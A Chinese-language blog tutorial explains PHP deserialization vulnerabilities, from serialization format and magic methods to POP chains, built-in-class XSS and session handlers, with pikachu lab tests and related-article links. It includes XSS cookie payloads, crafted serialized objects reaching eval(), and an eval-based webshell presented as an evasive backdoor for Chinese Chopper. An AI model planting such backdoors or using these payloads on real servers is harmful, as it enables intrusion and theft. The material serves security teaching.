php反序列化原理漏洞

最新推荐文章于 2025-11-18 17:49:55 发布
原创 最新推荐文章于 2025-11-18 17:49:55 发布 · 594 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全

1、 漏洞简介

PHP 反序列化漏洞是指在 PHP 代码中存在的对用户输入数据进行反序列化操作时,未对输入数据进行充分验证和过滤,导致攻击者可以构造恶意的序列化数据,从而在服务器端执行任意代码或进行其他恶意操作的安全漏洞

2、 漏洞影响范围

影响范围可能包括但不限于以下几个方面:

  1. 服务器端应用程序:PHP 反序列化漏洞可能导致服务器端应用程序受到攻击,攻击者可以执行任意代码、获取敏感信息、修改数据等。

  2. 用户数据安全:攻击者可以通过构造恶意的序列化数据,将恶意代码注入到用户提交的数据中,从而在服务器端执行任意代码,可能导致用户数据泄露或被篡改。

  3. 服务器安全:PHP 反序列化漏洞可能导致服务器本身受到攻击,攻击者可以通过执行任意代码获取服务器权限,进一步入侵其他系统或进行其他恶意活动。

3、 漏洞详解

3.1 序列化

将对象的状态信息转化为可存储或传输的形式

1.表达方式

class Test
{
    public $flag = "flag{*****}";
    public $name = "lang";
    public $age = 10;
}
​
$test1 = new Test();
$test1->flag = true;
$test1->name = "zhnag";
$test1->age = 20;
​
// 序列化
echo serialize($test1);
​
// out :O:4:"Test":2:{s:4:"flag";b:1;s:4:"name";s:5:"zhnag";}

2.魔术方法

  • serialize() 函数会检查类中是否存在一个魔术方法 sleep()。如果存在,sleep()方法会先被调用,然后才执行序列化操作。

  • 可以在sleep()方法里决定哪些属性可以被序列化。如果没有sleep()方法则默认序列化所有属性

<?php
class Test
{
    public $flag = "flag{*****}";
    public $name = "lang";
    public $age = 10;
​
    // __sleep() 方法决定哪些属性可以被序列化
    public function __sleep()
    {
        return array('flag', 'name');
    }
}
​
$test1 = new Test();
$test1->flag = true;
$test1->name = "zhnag";
$test1->age = 20;
​
// 序列化
echo serialize($test1);
​
// out :O:4:"Test":2:{s:4:"flag";b:1;s:4:"name";s:5:"zhnag";}
​
?>

3.2 访问控制修饰符

根据访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同

<?php
class Test
{
    // 访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同
    public $flag = "flag{*****}";
    protected $name = "lang";
    private $age = 10;
​
    // __sleep() 方法决定哪些属性可以被序列化
    public function __sleep()
    {
        return array('flag', 'name', 'age');
    }
}
​
$test1 = new Test();
$test1->flag = true;
// 保护和私有属性不能改变
// $test1->name = "zhnag";
// $test1->age = 20;
​
​
// protected属性被序列化的时候属性值会变成 %00*%00属性名  %00*%00flag
// private属性被序列化的时候属性值会变成 %00类名%00属性名  %00Test%00name
// %00为空白符,空字符也有长度,一个空字符长度为 1
​
// 序列化
echo serialize($test1);
// O:4:"Test":3:{s:4:"flag";b:1;s:7:"*name";s:4:"lang";s:9:"Testage";i:10;}
//  O:4:"Test":3:{s:4:"flag";b:1;s:7:"%00*%00name";s:4:"lang";s:9:"%00Test%00age";i:10;}
?>

3.3 反序列化

1.表达方式

反序列化函数 unserialize()。反序列化就是将一个序列化了的对象或数组字符串,还原回去

​
class Test
{
    public $flag = "flag{*****}";
    public $name = "lang";
    public $age = 10;
}
​
$test1 = new Test();
$test1->flag = true;
$test1->name = "zhnag";
$test1->age = 20;
​
// 反序列化
$str = serialize($test1);
// 反序列化函数unserialize()。反序列化就是将一个序列化了的对象或数组字符串,还原回去
var_dump(unserialize($str));
​
// output
​
// object(Test)#2 (3) { ["flag"]=> bool(true) ["name"]=> string(5) "zhnag" ["age"]=> int(20) }
​
/*
​
object(Test)#2 (3) {
  ["flag"]=>
  bool(true)
  ["name"]=>
  string(5) "zhnag"
  ["age"]=>
  int(20)
}
​
*/
​
class test
{
    public $a = 'langlang';
    protected $b = 666;
    private $c = false;
​
    public function displayVariable()
    {
        echo $this->a;
    }
}
$d = new test();
// var_dump($d)
// 序列化
// echo serialize($d);
$a = 'O:4:"test":3:{s:1:"a";s:4:"lang";s:4:"%00*%00b";i:888;s:7:"%00test%00c";b:0;}';
// 解码
$x = urldecode($a);
// 反序列化
// var_dump(unserialize($x));
$c = unserialize($x);
$c->displayVariable();
// echo urlencode($d)
// $a = urlencode($d);
// $b = unserialize(urldecode($a));
​
// var_dump($b)

2.魔术方法


class Test
{
    public $flag = "flag{*****}";
    public $name = "lang";
    public $age = 10;

    /*

    与序列化函数类似,unserialize()会检查类中是否存在一个__wakeup魔术方法
    如果存在则会先调用__wakeup()方法,再进行序列化

    可以在__wakeup()方法中对属性进行初始化、赋值或者改变

    */

    public function __wakeup()
    {
        $this->flag = "no flag";
    }
}

$test1 = new Test();
$test1->flag = true;
$test1->name = "zhagsan";
$test1->age = 20;

// 反序列化
$str = serialize($test1);
// 反序列化函数unserialize()。反序列化就是将一个序列化了的对象或数组字符串,还原回去
echo '<pre>';
var_dump(unserialize($str));

// output
/*
object(Test)#2 (3) {
  ["flag"]=>
  string(7) "no flag"
  ["name"]=>
  string(7) "zhagsan"
  ["age"]=>
  int(20)
}

*/

3.4 反序列化 POP 链

  1. 能控制的数据就是对象中的各个属性值

  2. 漏洞利用方法“面向属性编程”,完成类与类之间的调用

  3. 组件调用组件,其实就是魔术方法(wakeup(),sleep())

3.5 漏洞触发条件

  1. unserialize 函数的参数

  2. 变量可控

  3. php 文件中存在可利用的类

  4. 类中有魔术方法

3.6 魔术方法

        // 常见的几个魔法函数:
        __construct()当一个对象创建时被调用
​
        __destruct()当一个对象销毁时被调用
​
        __toString()当一个对象被当作一个字符串使用
​
        __sleep() 在对象在被序列化之前运行
​
        __wakeup()将在序列化之后立即被调用
​
        // 1. 漏洞举例:
​
        class S{
            var $test = "pikachu";
            function __destruct(){
                echo $this->test;
            }
        }
        $s = $_GET['test'];
        @$unser = unserialize($a);
​
        // 2. 构造对对象
        class S
        {
            var $test = "<script>alert(document.cookie)</script>";
        }
        $t = new S();
        echo serialize($t);
​
        // payload:O:1:"S":1:{s:4:"test";s:29:"alert(document.cookie)</script>";}

而在反序列化时,如果反序列化对象中存在魔法函数,使用 unserialize()函数同时也会触发。这样,一旦我们能够控制 unserialize()入口,那么就可能引发对象注入漏洞

3.7 测试

 构造序列化数据:

class S{
  var $test="<script>alert('php')</script>";
}
$t=new S();
echo serialize($t);
// 序列化后的内容
// O:1:"S":1:{s:4:"test";s:29:"";}
// 查看源码,脚本在序列化内容里面
// O:1:"S":1:{s:4:"test";s:29:"<script>alert('php')</script>";}
// 平台测试

测试结果:

 

  • _destruct() 当一个对象被销毁时被调用

class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['a']);
$obj = new Example();
$obj->var='phpinfo()';
var_dump(serialize($obj));
// O:7:"Example":1:{s:3:"var";s:9:"phpinfo()";}
​

 连菜刀、反序列化免杀后门

​
class A
{
    var $test = "demo";
    function __destruct()
    {
        @eval($this->test);
    }
}
$test = $_POST['test'];
$len = strlen($test) + 1;
// 构造序列化对象,用我们POST传过去的命令代码字符串覆盖$test="demo",从而执行恶意命令。
$pp = "O:1:\"A\":1:{s:4:\"test\";s:" . $len . ":\"" . $test . ";\";}";
// 反序列化同时触发_destruct函数
$test_unser = unserialize($pp);
​
// 以上代码相当于一行代码
<?php @eval($_POST['test']); ?>
​

 

连接菜刀

 

 

  • _toString() 如果在代码审计中有反序列化点,但是在原本的代码中找不到 pop 链该如何? N1CTF 有一个无 pop 链的反序列化的题目,其中就是找到 php 内置类来进行反序列化 (1)xss error exception 类 测试代码:

<?php
$a = unserialize($_GET['y']);
// 仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化
echo $a;
?>

exp:

// Error
$a = new Error("<script>alert('xxxphp')</script>");
// Exception
// $a = new Error("<script>alert('xxxphp')</script>");
echo urlencode(serialize($a));
echo

成功插入 xss,并执行代码

 

3.8 PHP 中 Session 反序列化

1.存储机制 默认

<?php
session_start();      // session_start()会创建新会话或者重用现有会话
$_SESSION['name'] = 'spoock';
var_dump();
?>
​

2.php_serialize

<?php
ini_set('session.serialize_handler', 'php_serialize');   // 设置序列化引擎使用php_serialize
session_start();       // 启动新会话或者重用现有会话
$_SESSION['name'] = 'spoock';
var_dump();
?>

3.php_binary

<?php
ini_set('session.serialize_handler', 'php_binary');
session_start();
$_SESSION['name'] = 'spoock';
var_dump();
?>

4.Session 漏洞利用

class Test{
    var $func="";
    function __construct(){
        $this->func="phpinfo()";
    }
    function __wakeup(){
        eval($this->func);
    }
​
}
unserialize($_GET['a'])

在 unserialize($_GET['a'])行对传入的参数进行了反序列化。我们可以通过传入一个特定的字符串,反序列化为 Test 的一个示例,那么就可以执行 eval()方法。我们访问 http://pikachu/vul/unserilization/sessions.php?a=O:4:%22Test%22:1:{s:4:%22func%22;s:14:%22echo%20%22spoock%22;%22;} 。

最后页面输出的就是 spoock,说明最后执行了我们定义的 echo “spoock”;方法

宁可123
关注
php 反序列化漏洞
渗透之路,攻防之间皆学问
01-09 5918
什么是序列化 序列化即 将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象 简单来说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信 。 反序列分为PHP反序列和java反序列化,下面就以PHP反序列化漏洞为切入点,讲述反序列化漏洞核心的原理,其他Java、Python等语言的反序列化漏洞,其原理基本相通。 PHP中的序列化和反序列化
PHP反序列化漏洞
m0_57379855的博客
03-12 3251
PHP反序列化漏洞PHP类与对象类对象Magic函数PHP序列化与反序列化不同类型的序列化pubilc与private反序列化反序列化漏洞的出现CTF题目分析PHP反序列+文件包含攻防世界Typecho反序列化漏洞PHP反序列化漏洞防御 PHP类与对象 类 一个共享相同结构和行为的对象的集合 对象 类的实例 Magic函数 PHP序列化与反序列化 序列化:把对象转化为可传输的字节序列过程称为序列化,可以在任何地方 反序列化:把字节序列还原为对象的过程称为反序列化。 不同类型的序列化 布尔值:b:
PHP反序列化漏洞-从入门到提升
AkangBoy的博客
11-09 1922
本文从PHP序列化原理讲起,逐渐深入到PHP反序列化及其漏洞,几乎每个知识点都配有代码演示,十分方便理解,希望对你们有所帮助!
Pikachu靶场-PHP反序列化漏洞
sucker的博客
04-27 1618
函数时,未对输入进行严格校验,导致攻击者构造恶意序列化字符串触发类中的魔术方法(Magic Methods),从而执行任意代码或进行危险操作。// 输出:O:7:"Example":1:{s:12:"Examplecmd";若反序列化的数据来源不可控(如用户输入、Cookie、数据库字段),攻击者可注入恶意对象。,且系统中使用了不安全PHP魔法方法,容易造成安全漏洞(如代码执行、XSS等)。:攻击者可构造恶意序列化数据,触发类属性覆盖或魔术方法执行。
PHP 反序列化漏洞详解:原理、利用链、真实案例与防御方案
最新发布
BEICHEN的博客
11-18 716
PHP 反序列化漏洞详解:通过将用户可控数据反序列化PHP对象,触发魔术方法(如__wakeup、__destruct)执行危险操作。漏洞核心在于构造POP链,利用类中的文件删除、命令执行等功能。典型利用方式包括文件删除和RCE,防御措施包括禁用unserialize函数、限制允许类、禁用危险魔术方法等。审计时应关注用户输入反序列化、魔术方法实现和危险函数调用。
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞
DXfighting_的博客
04-15 3061
原理PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 防御: 1)签名与认证。 如果序列化的内容没有用户可控参数,仅仅是服务端存储和应用,则可以通过签名认证,来避免应用接受黑客的
详解PHP序列化和反序列化原理
10-18
总结来说,PHP序列化和反序列化原理涉及对象状态的持久化存储和迁移,但需要注意自描述功能的实现、性能问题以及安全性问题。通过理解这些知识点,开发人员可以更加合理地在PHP应用中使用序列化机制,保证数据处理的...
PHP代码审计12—反序列化漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1917
PHP反序列化入门
PHP常见的序列化与反序列化操作实例分析
10-16
安全反序列化可能导致远程代码执行漏洞,因此在处理来自不可信源的序列化数据时,应特别谨慎。 - 对于包含对象的序列化,应考虑对象的序列化策略,如是否需要保留对象状态、方法等信息。 - 对于大型数据结构,应...
解锁反序列化漏洞:从原理到防护的安全指南
xinyaoyaotu的博客
02-06 1549
网络安全这片暗潮涌动的复杂海域中,反序列化漏洞就像隐藏在海平面下的巨型冰山,表面看似平静,实则潜藏着巨大的威胁。它如同黑客的得力 “内应”,趁人不备时,偷偷打开系统的防御大门,让攻击者长驱直入。今天,就让我们一同深入剖析这个危险的反序列化漏洞,全面了解它的原理、危害,以及行之有效的防范方法。在计算机科学的世界里,序列化与反序列化是一对紧密相关的概念。简单来说,序列化就像是把一个装满物品(对象状态信息)的大箱子,拆解并重新打包成便于运输或存放的小包裹(字节流、JSON 字符串等形式)。
序列化与反序列化漏洞详解
m0_55854679的博客
03-13 9809
文章目录小知识漏洞原理序列化反序列化函数解析序列化:serialize()函数反序列化 :unserialize()函数魔术方法pikachu靶场练习1靶场练习2总结 小知识 weblogic反序列化漏洞漏洞挖掘较难。 与变量覆盖一样,并不是说具体的漏洞,而是与它的具体代码有关。 === 【比较 数值相等、类型相等】 == 【比较,数值相等】 = 【赋值 赋予数值】 => 【键值分离】 -> 【类里面的方法调用或者传参】 漏洞原理 序列化: 游戏的
php反序列化漏洞
qq_49015005的博客
07-02 341
漏洞一般只能在代码审计中发现,很难再黑盒测试中发现 序列化serialize():把一个对象变成可以传输的字符串 class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object //代表是一个对象
反序列化漏洞PHP
qq_42383069的博客
05-18 6748
反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构 0x03. 序列化和反序列化代码示例 <?php class User { public $username = 'admin'; public $password = '123456';
深入解析PHP反序列化漏洞原理、利用与防护
xinyaoyaotu的博客
02-20 2008
PHP中,序列化(Serialization)是将对象或数据结构转换为字符串的过程,以便于存储或传输。反序列化(Deserialization)则是将字符串还原为对象或数据结构的过程。// 序列化// 输出:a:2:{s:4:"name";s:3:"age";i:25;// 反序列化// 输出:Array ( [name] => Alice [age] => 25 )PHP反序列化漏洞因其高危害性和隐蔽性,成为Web应用安全中的一大威胁。
php反序列化漏洞(万字详解)
永不落的梦想
07-26 8278
php反序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session反序列化、phar反序列化、原生类的利用以及各种绕过方式。
HUBUCTF新生赛checkin题解:PHP反序列化绕过分析
这里需要特别强调PHP序列化格式的基本结构: - `a:n:{}` 表示数组,包含n个键值对; - `s:n:"value"` 表示长度为n的字符串; - `b:1;` 或 `b:0;` 分别代表布尔值true和false; - 对象则用`O:`开头,但本题若仅反序列...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值